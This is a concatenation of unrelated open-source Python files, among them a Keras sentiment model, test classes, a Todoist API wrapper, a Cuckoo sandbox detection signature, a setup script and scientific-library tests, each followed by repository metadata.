task_embs = task_embs[0]
# extract only embeddings of known words
START_IDX = UNK_IDX + 1
w2v_embs = self._embs
# Compute the least square matrix
self._logger.info("Computing transform matrix for"
" task-specific embeddings.")
self._lstsq_mtx, res, rank, _ = np.linalg.lstsq(
w2v_embs[START_IDX:], task_embs[START_IDX:]
)
self._logger.info("Transform matrix computed"
" (rank: %d, residuals: %f).",
rank, sum(res))
self._embs = task_embs
# pop embedding layer and modify the first layer coming after it to
# accept plaing embeddings as input
self._recompile_model(emb_layer_idx)
self._pad_value = self._embs[EMPTY_IDX]
self._logger.info("Network finalized")
self._trained = True
def _get_layer_idx(self):
"""Return the index of embedding layer in the model.
Args:
name (str): name of the layer (IGNORED)
Returns:
int: index of embedding layer
"""
return 0
def _recompile_model(self, emb_layer_idx):
"""Change model by removing the embedding layer and .
Args:
emb_layer_idx (int): index of the embedding layer
Returns:
void:
Note:
modifies `self._model` in place
"""
layers = self._model.layers
emb_layer = layers.pop(emb_layer_idx)
first_layer = layers.pop(emb_layer_idx)
layer_config = first_layer.get_config()
layer_config["input_shape"] = (None, emb_layer.output_dim)
new_layer = first_layer.__class__.from_config(
layer_config
)
new_layer.build((emb_layer.input_dim, emb_layer.output_dim))
new_layer.set_weights(first_layer.get_weights())
layers.insert(emb_layer_idx, new_layer)
self._model = self._model.__class__(layers=layers)
self._model.compile(**self._train_params)
def _init_wemb_funcs(self):
"""Initialize functions for obtaining word embeddings.
"""
if self.ndim < 0:
self.ndim = DFLT_VDIM
if self._w2v:
self._embeddings.load()
self.ndim = self._embeddings.ndim
self.init_w_emb = self._init_w2v_emb
self.get_train_w_emb_i = self._get_train_w2v_emb_i
if self._trained:
self.get_test_w_emb = self._get_test_w2v_emb
else:
self.get_test_w_emb = self._get_train_w2v_emb_i
elif self._lstsq:
self._embeddings.load()
self.ndim = self._embeddings.ndim
self.init_w_emb = self._init_w2v_emb
self.get_train_w_emb_i = self._get_train_w2v_emb_i
if self._trained:
self.get_test_w_emb = self._get_test_w2v_lstsq_emb
else:
self.get_test_w_emb = self._get_train_w2v_emb_i
else:
# checked
self.init_w_emb = self._init_w_emb
self.get_train_w_emb_i = self._get_train_w_emb_i
self.get_test_w_emb = self._get_test_w_emb_i
def _reset_funcs(self):
"""Set all compiled theano functions to None.
Note:
modifies instance variables in place
"""
self.get_train_w_emb_i = None
self.get_test_w_emb_i = None
self.init_w_emb = None
def _init_w_emb(self):
"""Initialize task-specific word embeddings.
"""
self.W_EMB = Embedding(len(self._w2i), self.ndim,
embeddings_initializer=DFLT_INITIALIZER,
embeddings_regularizer=l2(L2_COEFF))
def _init_w2v_emb(self):
"""Initialize word2vec embedding matrix.
"""
self._embeddings.load()
self.ndim = self._embeddings.ndim
self._embs = np.empty((len(self._w2i), self.ndim))
self._embs[EMPTY_IDX, :] *= 0
self._embs[UNK_IDX, :] = 1e-2 # prevent zeros in this row
for w, i in iteritems(self._w2i):
if i == EMPTY_IDX or i == UNK_IDX:
continue
self._embs[i] = self._embeddings[w]
# initialize custom keras layer
self.W_EMB = Word2Vec(self._embs, trainable=self._lstsq)
# We unload embeddings every time before the training to free more
# memory. Feel free to comment the line below, if you have plenty of
# RAM.
self._embeddings.unload()
def _get_train_w_emb_i(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
int:
embedding index of the given word
"""
a_word = normlex(a_word)
if a_word in self._w2i:
return self._w2i[a_word]
elif self._w_stat[a_word] < 2 and np.random.binomial(1, UNK_PROB):
return UNK_IDX
else:
i = self._w2i[a_word] = len(self._w2i)
return i
    def _get_test_w_emb_i(self, a_word):
        """Obtain embedding index for the given word.

        Args:
            a_word (str):
                word whose embedding index should be retrieved

        Returns:
            int:
                embedding index of the given word (``UNK_IDX`` for
                words unseen during training)
        """
        a_word = normlex(a_word)
        return self._w2i.get(a_word, UNK_IDX)
def _get_train_w2v_emb_i(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
int: embedding index of the given word
"""
a_word = normlex(a_word)
if a_word in self._w2i:
return self._w2i[a_word]
elif a_word in self._embeddings:
i = self._w2i[a_word] = len(self._w2i)
return i
else:
return UNK_IDX
def _get_test_w2v_emb(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
np.array:
embedding of the input word
"""
a_word = normlex(a_word)
emb_i = self._w2i.get(a_word)
if emb_i is None:
if a_word in self._embeddings:
return self._embeddings[a_word]
return self._embs[UNK_IDX]
return self._embs[emb_i]
def _get_test_w2v_lstsq_emb(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
np.array:
embedding of the input word
"""
a_word = normlex(a_word)
emb_i = self._w2i.get(a_word)
if emb_i is None:
if a_word in self._embeddings:
return np.dot(self._embeddings[a_word],
self._lstsq_mtx)
return self._embs[UNK_IDX]
return self._embs[emb_i]
def _prepare_data(self, train_x, train_y, dev_x, dev_y):
"""Provide train/test split and digitize the data.
"""
if not dev_x:
n = len(train_x)
n_dev = int(n / 15)
idcs = list(range(n))
np.random.shuffle(idcs)
def get_split(data, idcs):
return [data[i] for i in idcs]
dev_x = get_split(train_x, idcs[:n_dev])
dev_y = get_split(train_y, idcs[:n_dev])
train_x = get_split(train_x, idcs[n_dev:])
train_y = get_split(train_y, idcs[n_dev:])
# convert tweets to word indices
train_x, dev_x = self._digitize_data(train_x, dev_x)
self._n_y = len(set(train_y) | set(dev_y))
train_y = to_categorical(np.asarray(train_y))
dev_y = to_categorical(np.asarray(dev_y))
return (train_x, train_y, dev_x, dev_y)
def _compute_w_stat(self, train_x):
"""Compute word frequencies on the corpus.
Args:
train_x (list[list[str]]): training instances
Returns:
void:
Note:
modifies instance variables in place
"""
self._w_stat = Counter(w for t in train_x for w in t)
def _digitize_data(self, train_x, dev_x):
"""Convert sequences of words to sequences of word indices.
Args:
train_x (list[list[str]]): training set
dev_x (list[list[str]]): development set
Returns:
2-tuple[list, list]: digitized training and development sets
"""
train_x = [self._tweet2wseq(x) for x in train_x]
dev_x = [self._tweet2wseq(x) for x in dev_x]
self._compute_w_stat(train_x)
self._wseq2emb_ids(train_x, self.get_train_w_emb_i)
self._wseq2emb_ids(dev_x, self.get_test_w_emb)
train_x = self._pad_sequences(train_x)
dev_x = self._pad_sequences(dev_x)
return (train_x, dev_x)
def _pad(self, xlen, pad_value=EMPTY_IDX):
"""Add indices or vectors of empty words to match minimum filter length.
Args:
xlen (int): length of the input instance
"""
return [pad_value] * max(0, self._min_width - xlen)
def _pad_sequences(self, x):
"""Make all input instances of equal length.
Args:
x (list[np.array]): list of embedding indices
Returns:
x: list of embedding indices of equal lengths
"""
return pad_sequences(x)
def _tweet2wseq(self, msg):
"""Convert tweet to a sequence of word lemmas if these words are informative.
Args:
msg (cgsa.data.Tweet): input message
Return:
list: lemmas of informative words
"""
return [normlex(w.lemma)
for w in msg if is_relevant(w.form)]
    def _wseq2emb_ids(self, data, w2i):
        """Convert sequences of words to embedding indices, in place.

        Args:
            data (list[list[str]]): input word sequences; each entry is
                replaced with an ``int32`` ``np.array`` of embedding indices,
                left-padded to the minimum filter width
            w2i (func): function to convert words to embedding indices

        Return:
            void: ``data`` is modified in place
        """
        for i, inst_i in enumerate(data):
            data[i] = np.asarray(
                self._pad(len(inst_i))
                + [w2i(w) for w in inst_i], dtype="int32")
    def _update_fit_params(self, train_y):
        """Add class weights to the training parameters.

        Args:
            train_y (list[np.array]): labels of training instances

        Returns:
            void:

        Note:
            modifies `self._fit_params` in place

        """
        # NOTE(review): this unconditional return disables the class-weight
        # computation below (the remaining statements are dead code) —
        # confirm whether sample weighting was switched off on purpose.
        return
        y_labels = np.argmax(train_y, axis=-1)
        class_weights = compute_class_weight("balanced",
                                             np.unique(y_labels),
                                             y_labels)
        sample_weights = np.array([class_weights[y_i]
                                   for y_i in y_labels])
        self._fit_params["sample_weight"] = sample_weights
        self._logger.debug("Class weights: %r", class_weights)
| WladimirSidorenko/CGSA | cgsa/dl/base.py | Python | mit | 20,205 |
#!/usr/bin/env python
#
# testing classes to test multiple inheritance.
# these are not meant to be run by trial, though they could be made to be so.
# i didn't know where to put them. --isis
import abc
from pprint import pprint
from inspect import classify_class_attrs
class PluginBase(object):
    """Abstract plugin interface (Python 2 ABC).

    Subclasses must provide a ``name`` property and an ``inputParser``
    method; the bodies here are placeholders that should never execute.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractproperty
    def name(self):
        return 'you should not see this'

    @name.setter
    def name(self, value):
        return 'you should not set this'

    @name.deleter
    def name(self):
        return 'you should not del this'

    @abc.abstractmethod
    def inputParser(self, line):
        """Do something to parse something."""
        return
class Foo(object):
woo = "this class has some shit in it"
def bar(self):
print "i'm a Foo.bar()!"
print woo
class KwargTest(Foo):
    """Demonstrates kwarg-driven attribute injection at instantiation time."""
    _name = "isis"
    #def __new__(cls, *a, **kw):
    #    return super(KwargTest, cls).__new__(cls, *a, **kw)

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, value):
        self._name = value

    def __init__(self, *a, **kw):
        super(KwargTest, self).__init__()
        ## this causes the instantion args to override the class attrs
        # NOTE(review): setattr on self.__class__ mutates shared class state,
        # so every later instance observes the last-passed kwargs — confirm
        # this side effect is intended.
        for key, value in kw.items():
            setattr(self.__class__, key, value)
        print "%s.__init__(): self.__dict__ = %s" \
            % (type(self), pprint(type(self).__dict__))
        for attr in classify_class_attrs(self):
            print attr

    @classmethod
    def sayname(cls):
        # NOTE(review): at class level ``cls.name`` resolves to the property
        # object itself, not an instance value — verify the intended output.
        print cls.name
class KwargTestChild(KwargTest):
    """Child that shadows the parent's ``name`` property with a class attribute."""
    name = "arturo"

    def __init__(self):
        super(KwargTestChild, self).__init__()
        print self.name
class KwargTestChildOther(KwargTest):
    """Child taking default kwargs that are *not* forwarded to the parent."""

    def __init__(self, name="robot", does="lasers"):
        # NOTE(review): ``name`` and ``does`` are accepted but never passed on
        # to KwargTest.__init__, so they have no effect — confirm intended.
        super(KwargTestChildOther, self).__init__()
        print self.name
if __name__ == "__main__":
    # Exercise the kwarg-injection behaviour of KwargTest and its children,
    # printing class-level vs instance-level attribute resolution at each step.
    print "class KwargTest attr name: %s" % KwargTest.name
    kwargtest = KwargTest()
    print "KwargTest instantiated wo args"
    print "kwargtest.name: %s" % kwargtest.name
    print "kwargtest.sayname(): %s" % kwargtest.sayname()
    kwargtest2 = KwargTest(name="lovecruft", does="hacking")
    print "KwargTest instantiated with name args"
    print "kwargtest.name: %s" % kwargtest2.name
    print "kwargtest.sayname(): %s" % kwargtest2.sayname()
    print "class KwargTestChild attr name: %s" % KwargTestChild.name
    kwargtestchild = KwargTestChild()
    print "KwargTestChild instantiated wo args"
    print "kwargtestchild.name: %s" % kwargtestchild.name
    print "kwargtestchild.sayname(): %s" % kwargtestchild.sayname()
    print "class KwargTestChildOther attr name: %s" % KwargTestChildOther.name
    kwargtestchildother = KwargTestChildOther()
    print "KwargTestChildOther instantiated wo args"
    print "kwargtestchildother.name: %s" % kwargtestchildother.name
    print "kwargtestchildother.sayname(): %s" % kwargtestchildother.sayname()
| hackerberry/ooni-probe | tests/test-class-design.py | Python | bsd-2-clause | 2,996 |
#!/usr/bin/python
import argparse
import os
import sys
import LightsClient
# Parse the single positional argument: the sequence to run.
parser = argparse.ArgumentParser()
parser.add_argument( 'sequenceName', metavar = 'sequence-name', type = str, nargs = 1, help = 'the new sequence name' )
args = parser.parse_args()
# re-open STDOUT so that it is un-buffered
sys.stdout = os.fdopen( sys.stdout.fileno(), 'w', 0 )
# Ask the lights server to start the requested sequence.
request = { 'command' : 'runSequence', 'sequenceName' : args.sequenceName[ 0 ] }
response = LightsClient.runCommand( request )
if 'success' in response and response[ 'success' ]:
    # Report the sequence now playing and its progress.
    print 'current sequence: %s' % ( response[ 'currentSequence' ] )
    print 'frame: %d of %d' % ( response[ 'currentFrame' ], response[ 'numFrames' ] )
    print 'frames per second: %d' % ( response[ 'framesPerSecond' ] )
else:
    # On failure, dump the raw response for debugging.
    print response
| mattlyle/NeopixelXMasTree | server/backend/helper-scripts/run-sequence.py | Python | mit | 791 |
import math
from sqlalchemy.orm.exc import NoResultFound
from leaderboard.db import session_factory
from leaderboard.models.country_bounds import CountryBounds
from leaderboard.geo_util import coord_utils
from leaderboard.models.contributor import Contributor
from leaderboard.models.db import LeaderboardGlobals
from leaderboard.models.tile import Tile
from leaderboard.models import reportweeks
from test_base import BaseTest
class TestModels(BaseTest):
    """Exercises the leaderboard ORM models against the test database session."""
    def test_countries_id_is_correct(self):
        """The imported country table should give Afghanistan feature id 1."""
        with self.session.begin(subtransactions=True):
            row = self.session.query(CountryBounds).filter_by(name='Afghanistan')
            assert row
            item = row.first()
            assert item.ogc_fid == 1
    def get_canada(self):
        """Helper (not a test): fetch the Canada row from the country table."""
        with self.session.begin(subtransactions=True):
            item = self.session.query(CountryBounds).filter_by(name='Canada').first()
            assert isinstance(item, CountryBounds)
            return item
    def test_add_contributor_tile_and_report(self):
        """A contributor, a tile and a report-week row insert together cleanly."""
        with self.session.begin(subtransactions=True):
            contributor = Contributor()
            contributor.nickname = 'nick'
            tile = Tile()
            self.session.add(contributor)
            self.session.add(tile)
            reportweeks.insert_or_update_reportweek(contributor, tile)
    def test_add_tile_for_coord(self):
        """A tile built from Toronto-area coordinates resolves to Canada under
        all three country-assignment strategies (default/intersect/nearby)."""
        with self.session.begin(subtransactions=True):
            tile = Tile()
            mercator_coords = Tile.create_tile_ewkt_wgs84(-79.4, 43.7)
            tile.geometry = mercator_coords
            self.session.add(tile)
            CountryBounds.set_country_for_tile(tile)
            canada = self.get_canada()
            assert tile.country == canada
            CountryBounds.set_country_for_tile(tile, use_intersect=True)
            assert tile.country == canada
            CountryBounds.set_country_for_tile(tile, use_nearby=True)
            assert tile.country == canada
    def test_coord_conversion(self):
        """Python-side and database-side coordinate conversions agree to <5 m."""
        e1 = coord_utils.lon2x_m(-80)
        n1 = coord_utils.lat2y_m(44)
        e2, n2 = coord_utils.db_get_easting_northing(-80, 44)
        assert math.fabs(e1 - e2) < 5
        assert math.fabs(n1 - n2) < 5
    def test_weekly_rollover(self):
        """Report data is truncated on access when the stored week falls behind."""
        # add data
        self.test_add_contributor_tile_and_report()
        week_class = reportweeks.get_current_reportweek_class()
        session = session_factory()
        rows = None
        try:
            rows = session.query(week_class).one()
        except NoResultFound:
            pass
        assert rows
        g = LeaderboardGlobals.get_globals()
        # Rewind the stored week so the next access sees it as stale.
        g.current_week = reportweeks.current_week_number() - 1
        # verify data gets truncated on next access
        week_class = reportweeks.get_current_reportweek_class()
        session = session_factory()
        rows = None
        try:
            rows = session.query(week_class).one()
        except NoResultFound:
            pass
        assert not rows
| garvankeeley/leaderboard_backend | tests/test_models.py | Python | mpl-2.0 | 3,003 |
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2013, Luis Pedro Coelho <luis@luispedro.org>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
# License: MIT. See COPYING.MIT file in the Waldo distribution
from __future__ import division

try:
    import setuptools
except ImportError:
    # Only a missing setuptools should trigger the friendly hint; the old
    # bare ``except:`` also swallowed KeyboardInterrupt and unrelated errors.
    from sys import exit
    print('''
setuptools not found. Please install it.
On linux, the package is often called python-setuptools''')
    exit(1)

# Read the long description via a context manager so the handle is closed
# deterministically; the ``file()`` builtin used before is Python 2 only and
# would crash this script under Python 3.
with open('README.rst') as readme:
    long_description = readme.read()

# Trove classifiers describing the package on PyPI.
classifiers = [
    'Development Status :: 4 - Beta',
    'License :: OSI Approved :: MIT License',
    'Operating System :: POSIX',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Topic :: Scientific/Engineering',
    'Intended Audience :: Science/Research',
    ]

# Runtime dependencies.
install_requires = [
    'sqlalchemy',
    'lxml',
    ]

package_dir = {
    'waldo.tests': 'waldo/tests',
    }

# Non-Python files shipped with the listed packages.
package_data = {
    'woof': ['templates/*.html', 'templates/static/*.html', 'media/css/*.css'],
    'waldo.tests': ['data/*'],
    }

setuptools.setup(name = 'waldo',
      version = '0.1',
      description = 'Protein Subcellular Location Information Package',
      long_description = long_description,
      author = 'Luis Pedro Coelho and others (See AUTHORS.txt file)',
      author_email = 'luis@luispedro.org',
      license = 'MIT',
      platforms = ['Any'],
      classifiers = classifiers,
      url = 'http://murphylab.web.cmu.edu/services/waldo/home',
      packages = setuptools.find_packages(),
      install_requires = install_requires,
      package_dir = package_dir,
      package_data = package_data,
      scripts = ['bin/update-waldo'],
      test_suite = 'nose.collector',
      )
| luispedro/waldo | setup.py | Python | mit | 1,654 |
#Quiz Problem 4
def greedySum(L, s):
    """ input: s, positive integer, what the sum should add up to
        L, list of unique positive integers sorted in descending order
    Use the greedy approach where you find the largest multiplier for
    the largest value in L then for the second largest, and so on to
    solve the equation s = L[0]*m_0 + L[1]*m_1 + ... + L[n-1]*m_(n-1)

    return: the sum of the multipliers or "no solution" if greedy approach does
    not yield a set of multipliers such that the equation sums to 's'
    """
    remaining = s          # portion of s not yet covered by earlier values
    multiplier_total = 0   # running sum of the chosen multipliers
    for value in L:
        # Largest m with m * value <= remaining, computed in O(1) with floor
        # division instead of the original O(m) increment-and-test loop.
        m = remaining // value
        multiplier_total += m
        remaining -= m * value
    # The greedy choice succeeded only if the values cover s exactly.
    if remaining == 0:
        return multiplier_total
    return 'no solution'
# tubex-lib - Examples
# Contractors on tubes: temporal contractors
# Comparison between the Lohner & Picard temporal contractors
# ----------------------------------------------------------------------------
# Auguste Bourgois, 2020
from pyibex import *
from tubex_lib import *
import sys # only for checking if this example still works
# =========== INITIALIZATION ===========
dt = 0.1 # time step of the tubes
tdomain = Interval(0, 5) # time domain of the tubes
x = TubeVector(tdomain, dt, 1) # 1d tube vector
x.set(IntervalVector(1, Interval(0.9, 1.1)), 0.) # initial condition
y = TubeVector(x) # copy of x
beginDrawing()
# =========== COMPARISON OF CONTRACTORS ===========
f = Function("x", "-sin(x)") # xdot = -sin(x)
# Picard contractor (applied to x)
ctc_picard = CtcPicard(f)
ctc_picard.contract(x)
fig1 = VIBesFigTube("Picard integration")
fig1.set_properties(100, 100, 800, 400)
fig1.add_tube(x[0], "x")
# Lohner contractor (applied to y, the copy, for a side-by-side comparison)
ctc_lohner = CtcLohner(f)
ctc_lohner.contract(y)
fig2 = VIBesFigTube("Lohner integration")
fig2.set_properties(100, 550, 800, 400)
fig2.add_tube(y[0], "y")
# =========== COMPUTING TRAJECTORIES AS ILLUSTRATION ===========
# NOTE(review): the list is seeded with the Trajectory *class* as a
# placeholder; every slot is overwritten in the loop below, so this works,
# but [None] * 11 would state the intent more clearly.
v_traj = [Trajectory for _ in range(11)]
for i in range(0,len(v_traj)):
    x0 = 0.9 + 0.199 * (i / 10.) # initial conditions in [x0]=[0.9,1.1]
    # Closed-form solution of xdot = -sin(x) scaled by the initial condition.
    v_traj[i] = Trajectory(tdomain, TFunction(str(x0) + "*2.*atan(exp(-t)*tan(0.5))"))
    fig1.add_trajectory(v_traj[i], "truth" + str(i))
    fig2.add_trajectory(v_traj[i], "truth" + str(i))
fig1.show(True)
fig2.show(True)
fig1.axis_limits(fig2.view_box())
endDrawing()
# =========== ENDING ===========
# Checking if this example still works:
# NOTE(review): exiting with status 0 (success) when a containment check
# *fails* looks inverted -- confirm the intended CI semantics.
for traj_i in v_traj:
    if x[0].contains(traj_i) != BoolInterval.YES:
        sys.exit(0)
    if y[0].contains(traj_i) != BoolInterval.YES:
        sys.exit(0)
# Checking if this example still works:
sys.exit(0 if fabs(x[0].volume() - 13.9148) < 1e-2 and fabs(y[0].volume() - 0.43186) < 1e-2 else 1)
from pprint import pformat
class Model(object):
    """
    Base wrapper around a raw data dictionary returned by the API.

    Item access on the instance is delegated to the underlying ``data``
    mapping, so ``obj['id']`` reads and ``obj['id'] = v`` writes
    ``obj.data``.
    """
    def __init__(self, data, api):
        self.temp_id = ''
        self.data = data
        self.api = api

    def __setitem__(self, key, value):
        # Writes pass straight through to the wrapped mapping.
        self.data[key] = value

    def __getitem__(self, key):
        # Reads are delegated to the wrapped mapping as well.
        return self.data[key]

    def __repr__(self):
        # e.g. "Item({'id': 1, ...})" -- pretty-printed for readability.
        return '%s(%s)' % (type(self).__name__, pformat(dict(self.data)))
class Filter(Model):
    """
    Wraps a single Todoist filter.
    """
    def update(self, **kwargs):
        """
        Queues an update request for this filter and mirrors the change
        into the local data dictionary.
        """
        self.api.filters.update(self.data['id'], **kwargs)
        self.data.update(kwargs)

    def delete(self):
        """
        Queues a delete request for this filter and marks the local copy
        as deleted.
        """
        self.api.filters.delete(self.data['id'])
        self.data['is_deleted'] = 1
class Item(Model):
    """
    Wraps a single Todoist item (task).
    """
    def update(self, **kwargs):
        """
        Queues an update request for this item and mirrors the change into
        the local data dictionary.
        """
        self.api.items.update(self.data['id'], **kwargs)
        self.data.update(kwargs)

    def delete(self):
        """
        Queues a delete request for this item and marks the local copy as
        deleted.
        """
        self.api.items.delete([self.data['id']])
        self.data['is_deleted'] = 1

    def move(self, to_project):
        """
        Queues a move of this item into *to_project* and updates the local
        project id accordingly.
        """
        self.api.items.move({self.data['project_id']: [self.data['id']]}, to_project)
        self.data['project_id'] = to_project

    def close(self):
        """
        Marks item as closed
        """
        self.api.items.close(self.data['id'])

    def complete(self, force_history=0):
        """
        Queues a completion request and mirrors the checked/in_history
        flags locally.
        """
        self.api.items.complete([self.data['id']], force_history)
        self.data['checked'] = 1
        self.data['in_history'] = force_history

    def uncomplete(self, update_item_orders=1, restore_state=None):
        """
        Queues an un-completion request; when *restore_state* carries a
        saved state for this item, the local flags are restored from it.
        """
        self.api.items.uncomplete([self.data['id']], update_item_orders,
                                  restore_state)
        self.data['checked'] = 0
        self.data['in_history'] = 0
        item_id = self.data['id']
        if restore_state and item_id in restore_state:
            saved = restore_state[item_id]
            # Saved tuple layout: (in_history, checked, item_order, indent).
            self.data['in_history'] = saved[0]
            self.data['checked'] = saved[1]
            self.data['item_order'] = saved[2]
            self.data['indent'] = saved[3]

    def update_date_complete(self, new_date_utc=None, date_string=None,
                             is_forward=None):
        """
        Queues a recurring-task completion and mirrors the new due date /
        date string locally when provided.
        """
        self.api.items.update_date_complete(self.data['id'], new_date_utc,
                                            date_string, is_forward)
        if new_date_utc:
            self.data['due_date_utc'] = new_date_utc
        if date_string:
            self.data['date_string'] = date_string
class Label(Model):
    """
    Wraps a single Todoist label.
    """
    def update(self, **kwargs):
        """
        Queues an update request for this label and mirrors the change
        into the local data dictionary.
        """
        self.api.labels.update(self.data['id'], **kwargs)
        self.data.update(kwargs)

    def delete(self):
        """
        Queues a delete request for this label and marks the local copy
        as deleted.
        """
        self.api.labels.delete(self.data['id'])
        self.data['is_deleted'] = 1
class LiveNotification(Model):
    """
    Implements a live notification.
    """
    # No operations beyond the generic Model behaviour are defined here.
    pass
class GenericNote(Model):
    """
    Shared behaviour for item notes and project notes.
    """
    #: has to be defined in subclasses -- points at the matching API manager
    local_manager = None

    def update(self, **kwargs):
        """
        Queues an update request for this note through the subclass's
        manager and mirrors the change into the local data dictionary.
        """
        self.local_manager.update(self.data['id'], **kwargs)
        self.data.update(kwargs)

    def delete(self):
        """
        Queues a delete request for this note through the subclass's
        manager and marks the local copy as deleted.
        """
        self.local_manager.delete(self.data['id'])
        self.data['is_deleted'] = 1
class Note(GenericNote):
    """
    Implement an item note.
    """
    def __init__(self, data, api):
        GenericNote.__init__(self, data, api)
        # Item notes are managed through the ``notes`` endpoint.
        self.local_manager = api.notes
class ProjectNote(GenericNote):
    """
    Implement a project note.
    """
    def __init__(self, data, api):
        GenericNote.__init__(self, data, api)
        # Project notes are managed through the ``project_notes`` endpoint.
        self.local_manager = api.project_notes
class Project(Model):
    """
    Wraps a single Todoist project.
    """
    def update(self, **kwargs):
        """
        Queues an update request for this project and mirrors the change
        into the local data dictionary.
        """
        self.api.projects.update(self.data['id'], **kwargs)
        self.data.update(kwargs)

    def delete(self):
        """
        Queues a delete request for this project and marks the local copy
        as deleted.
        """
        self.api.projects.delete([self.data['id']])
        self.data['is_deleted'] = 1

    def archive(self):
        """
        Queues an archive request and flags the local copy as archived.
        """
        self.api.projects.archive(self.data['id'])
        self.data['is_archived'] = 1

    def unarchive(self):
        """
        Queues an unarchive request and clears the local archived flag.
        """
        self.api.projects.unarchive(self.data['id'])
        self.data['is_archived'] = 0
class Reminder(Model):
    """
    Wraps a single Todoist reminder.
    """
    def update(self, **kwargs):
        """
        Queues an update request for this reminder and mirrors the change
        into the local data dictionary.
        """
        self.api.reminders.update(self.data['id'], **kwargs)
        self.data.update(kwargs)

    def delete(self):
        """
        Queues a delete request for this reminder and marks the local copy
        as deleted.
        """
        self.api.reminders.delete(self.data['id'])
        self.data['is_deleted'] = 1
| ajar98/todoist_bot | todoist/models.py | Python | mit | 6,334 |
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Accuvant, Inc. (bspengler@accuvant.com)
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class InjectionExtension(Signature):
    name = "injection_needextension"
    description = "尝试执行自身的拷贝,但需要.exe后缀才能工作"
    severity = 3
    categories = ["injection"]
    authors = ["Accuvant"]
    minimum = "1.0"
    evented = True
    # Deliver only CreateProcessInternalW events to on_call().  This must be
    # an attribute of the signature, not a local variable: the original code
    # assigned it to a local inside __init__, where it was silently discarded
    # and never reached the monitoring engine.
    filter_apinames = set(["CreateProcessInternalW"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)

    def on_call(self, call, process):
        """Flag a failed attempt to spawn a copy of the current process that
        would only have succeeded with an explicit .exe extension."""
        if call["status"] == False:
            # Normalise the current process name to its .exe form.
            procname = process["process_name"].lower()
            if not procname.endswith(".exe"):
                procname += ".exe"
            apiarg1 = self.get_argument(call, "ApplicationName")
            apiarg2 = self.get_argument(call, "CommandLine")
            if apiarg1.endswith(procname) or apiarg2.endswith(procname):
                return True
| lixiangning888/whole_project | modules/signatures_merge_tmp/injection_needextension.py | Python | lgpl-3.0 | 1,136 |
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django import forms
class UserRegistrationForm(UserCreationForm):
    """Sign-up form: Django's stock UserCreationForm restricted to the
    username and email fields of the User model."""
    class Meta:
        model = User
        fields = ('username', 'email',)
| cscanlin/munger-builder | munger_builder/forms.py | Python | mit | 269 |
# (C) British Crown Copyright 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""Test function :func:`iris._lazy data.as_concrete_data`."""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import numpy.ma as ma
from iris._lazy_data import as_concrete_data, as_lazy_data, is_lazy_data
from iris.tests import mock
class MyProxy(object):
    """Minimal array proxy: records the wrapped array's shape/dtype and
    defers all indexing to it, mimicking the interface of lazy data."""
    def __init__(self, a):
        self.a = a
        self.shape = a.shape
        self.dtype = a.dtype

    def __getitem__(self, keys):
        # Indexing falls straight through to the wrapped array.
        return self.a[keys]
class Test_as_concrete_data(tests.IrisTest):
    """Tests for as_concrete_data with real, masked, lazy and proxied input."""
    def test_concrete_input_data(self):
        # Already-real data must be returned unchanged (the same object).
        data = np.arange(24).reshape((4, 6))
        result = as_concrete_data(data)
        self.assertIs(data, result)
        self.assertFalse(is_lazy_data(result))
    def test_concrete_masked_input_data(self):
        # Masked arrays are also passed straight through.
        data = ma.masked_array([10, 12, 8, 2], mask=[True, True, False, True])
        result = as_concrete_data(data)
        self.assertIs(data, result)
        self.assertFalse(is_lazy_data(result))
    def test_lazy_data(self):
        # Lazy data is realised to an equal concrete array.
        data = np.arange(24).reshape((2, 12))
        lazy_array = as_lazy_data(data)
        self.assertTrue(is_lazy_data(lazy_array))
        result = as_concrete_data(lazy_array)
        self.assertFalse(is_lazy_data(result))
        self.assertArrayEqual(result, data)
    def test_lazy_mask_data(self):
        # Realising lazy masked data must preserve the fill value.
        data = np.arange(24).reshape((2, 12))
        fill_value = 1234
        mask_data = ma.masked_array(data, fill_value=fill_value)
        lazy_array = as_lazy_data(mask_data)
        self.assertTrue(is_lazy_data(lazy_array))
        result = as_concrete_data(lazy_array)
        self.assertFalse(is_lazy_data(result))
        self.assertMaskedArrayEqual(result, mask_data)
        self.assertEqual(result.fill_value, fill_value)
    def test_lazy_scalar_proxy(self):
        # A proxied 0-d array realises to the underlying scalar value.
        a = np.array(5)
        proxy = MyProxy(a)
        lazy_array = as_lazy_data(proxy)
        self.assertTrue(is_lazy_data(lazy_array))
        result = as_concrete_data(lazy_array)
        self.assertFalse(is_lazy_data(result))
        self.assertEqual(result, a)
    def test_lazy_scalar_proxy_masked(self):
        # Same as above, but with a fully masked 0-d array.
        a = np.ma.masked_array(5, True)
        proxy = MyProxy(a)
        lazy_array = as_lazy_data(proxy)
        self.assertTrue(is_lazy_data(lazy_array))
        result = as_concrete_data(lazy_array)
        self.assertFalse(is_lazy_data(result))
        self.assertMaskedArrayEqual(result, a)
if __name__ == '__main__':
tests.main()
